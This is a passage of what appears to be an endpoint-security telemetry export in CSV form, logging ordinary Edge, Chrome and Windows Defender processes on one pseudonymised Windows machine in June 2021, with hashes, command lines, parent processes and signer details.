(x86)\Microsoft\Edge\Application\91.0.864.59\identity_helper.exe,1080736,b4521adad3d48999783119440df8f778,307456fb34b9c5b7621b70a9da9659dedde6eea45c570afd960e9427a5d6c9df,9885be7d4dfa860f6f598414641ff2af5baf5845,eaa5674047232d4a08e3f5a80ae41847,15a778c756ac6b0f18a1b8190e9091968b436ebe722213acbd9a1cadbdb985af,8ce6b1a36c89339834303a2877dbcea1b76a2e16,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-25 00:39:22.280625600+00:00,10392,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-25 00:39:00.068282600+00:00,15164,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:54:39.236590300+00:00,2021-06-25 00:55:58.751176500+00:00,30545e9a-4d03-4aa8-ac3f-a31a0b0a3a1e,computerpii_0a470890c60768167990033d701e7bd881398861,182130,False,10.7740.19041.1052,False,11540474045178212,,11540474045178526,2021-06-25 00:39:22.280625600+00:00,10392,2021-06-25 00:39:22.280625600+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,10392,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278240,2021-06-23 22:21:15+00:00,2021-06-24 06:58:35.468763900+00:00,2021-06-25 00:39:22.414877700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.59,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+1357,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-25 00:54:50.588216600+00:00,10964,SenseCncProxy.exe,4828,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:54:51.581969600+00:00,2021-06-25 00:55:58.751275700+00:00,38425e0a-fe14-4a83-903a-c1ee1d50d672,computerpii_0a470890c60768167990033d701e7bd881398861,182133,False,10.7740.19041.1052,False,11540474045137006,,11540474045178529,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1358,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:16.410863500+00:00,10660,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8336 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:16.476625+00:00,2021-06-24 02:29:48.811285400+00:00,ae731f73-e16e-489d-96fa-8fc7e3c0e4b7,computerpii_0a470890c60768167990033d701e7bd881398861,173350,False,10.7740.19041.1052,False,11540474045175164,,11540474045176010,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1359,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:16.417470300+00:00,9956,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7344 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:16.476871400+00:00,2021-06-24 02:29:48.811328800+00:00,57c50655-2e41-49a1-ad64-f9ea69179811,computerpii_0a470890c60768167990033d701e7bd881398861,173351,False,10.7740.19041.1052,False,11540474045175164,,11540474045176011,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1360,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:16.530412200+00:00,20712,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:16.566402700+00:00,2021-06-24 02:29:48.811474400+00:00,65e1c363-6752-4a9d-8684-ec4e0b70094e,computerpii_0a470890c60768167990033d701e7bd881398861,173354,False,10.7740.19041.1052,False,11540474045175164,,11540474045176012,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1361,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:16.813562300+00:00,10368,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1408 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:16.845360900+00:00,2021-06-24 02:29:48.811563900+00:00,9f687ad4-b535-4b71-acef-30e3a9103968,computerpii_0a470890c60768167990033d701e7bd881398861,173356,False,10.7740.19041.1052,False,11540474045175164,,11540474045176013,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1362,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:16.873416100+00:00,7436,chrome.exe,"""chrome.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7620 /prefetch:8",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:17.145881500+00:00,2021-06-24 02:29:48.811697400+00:00,726628a1-2198-46d6-8539-b37553291aef,computerpii_0a470890c60768167990033d701e7bd881398861,173359,False,10.7740.19041.1052,False,11540474045175164,,11540474045176014,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,18560,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1363,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:17.732350300+00:00,17676,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8148 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:18.161210100+00:00,2021-06-24 02:29:48.811784600+00:00,3d9fffdd-c150-49a3-a78f-9cff57d2955a,computerpii_0a470890c60768167990033d701e7bd881398861,173361,False,10.7740.19041.1052,False,11540474045175164,,11540474045176015,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1364,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:21.534442200+00:00,19704,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1544 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:21.578744600+00:00,2021-06-24 02:29:48.812051600+00:00,bcf01cbf-eb80-4520-8e0c-c376bad73ee3,computerpii_0a470890c60768167990033d701e7bd881398861,173367,False,10.7740.19041.1052,False,11540474045175164,,11540474045176016,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,chrome.exe,18968,256,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+1365,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 02:29:21.718520900+00:00,11620,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1728,4671010153997855514,16646605996095115804,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8060 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:21.237057100+00:00,18968,chrome.exe,"""chrome.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 02:29:21.754407900+00:00,2021-06-24 02:29:48.812318900+00:00,5d77f8ad-4f2f-4863-8072-e68409d2ace6,computerpii_0a470890c60768167990033d701e7bd881398861,173373,False,10.7740.19041.1052,False,11540474045175164,,11540474045176017,2021-06-24 00:52:21.237057100+00:00,18968,2021-06-24 00:52:21.237057100+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,18968,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
